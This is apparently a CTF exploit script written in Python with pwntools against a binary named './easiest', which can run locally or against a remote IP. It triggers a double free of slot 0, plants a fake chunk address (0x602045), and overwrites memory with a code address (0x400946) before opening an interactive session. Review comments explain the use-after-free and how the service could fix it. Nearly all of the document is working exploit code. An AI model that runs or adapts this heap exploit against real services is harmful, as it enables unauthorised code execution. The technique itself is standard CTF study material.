| from pwn import *
def Add(p, idx, size, content):
    """Answer the service's "add" dialogue on the tube ``p``.

    Sends menu choice 1, then ``idx``, ``size`` and ``content``, each one
    only after the prompt it answers has been received. ``size`` is sent
    as decimal text; ``content`` is passed through unchanged.
    """
    # (prompt to wait for, line to send), in the order the dialogue runs.
    dialogue = (
        ('delete \n', str(1)),
        ('(0-11):', str(idx)),
        ('Length:', str(size)),
        ('C:', content),
    )
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)
def Delete(p, idx):
    """Answer the service's "delete" dialogue on the tube ``p``.

    Sends menu choice 2 and then ``idx``, each after its prompt.
    """
    # (prompt to wait for, line to send), in the order the dialogue runs.
    for prompt, reply in (('delete \n', str(2)), ('(0-11):', str(idx))):
        p.sendlineafter(prompt, reply)
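def pwn():
    """Replay this write-up's add/delete sequence against ``./easiest``.

    With ``DEBUG == 1`` the binary is started locally; otherwise the
    script connects to the remote instance. The sequence creates four
    entries, deletes index 0 twice with index 1 deleted in between, and
    then re-adds entries whose contents are hard-coded absolute addresses.

    NOTE(review): the sequence only makes sense if the service keeps a
    slot usable after it has been deleted -- confirm in the binary. On the
    service side the fix would be to clear the slot on delete and to
    reject a delete of an empty slot. The hard-coded addresses also
    presuppose a fixed load address for the binary.
    """
    BIN_PATH = './easiest'
    DEBUG = 1
    context.arch = 'amd64'

    if DEBUG == 1:
        p = process(BIN_PATH)
        context.terminal = ['tmux', 'split', '-h']
    else:
        p = remote('39.96.9.148', 9999)
    # Not referenced below; loading it makes pwntools log the binary's
    # mitigation summary, which is useful context for the fixed addresses.
    elf = ELF(BIN_PATH)
    context.log_level = 'debug'

    # Two 0x68-byte entries and two 0x100-byte entries.
    Add(p, 0, 0x68, 'sunichi')
    Add(p, 1, 0x68, 'sunichi')
    Add(p, 2, 0x100, 'sunichi')
    Add(p, 3, 0x100, 'sunichi')

    # Index 0 is deleted twice, separated by the delete of index 1.
    Delete(p, 0)
    Delete(p, 1)
    Delete(p, 0)
    Delete(p, 2)

    # The first re-added entry carries 0x602045 as its content.
    # presumably an address in the binary's writable data -- TODO confirm
    Add(p, 0, 0x68, p64(0x602045))
    Add(p, 1, 0x68, 'sunichi')
    Add(p, 2, 0x68, 'sunichi')
    # Three pad bytes, then six copies of 0x400946 (presumably a code
    # address inside the binary -- TODO confirm). The bytes literal keeps
    # the concatenation with p64() valid on Python 3 as well as Python 2.
    payload = b'\x00\x00\x00' + p64(0x400946) * 6
    Add(p, 3, 0x68, payload)

    if DEBUG == 1:
        # A debugger can only be attached to the locally started process;
        # the remote tube has no local process to attach to.
        gdb.attach(p)
        # pause() is pwntools' wait-for-key helper; raw_input() exists
        # only on Python 2.
        pause()
    p.interactive()
    p.close()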
# Run the sequence only when executed as a script, not when imported.
if __name__ == '__main__':
    pwn()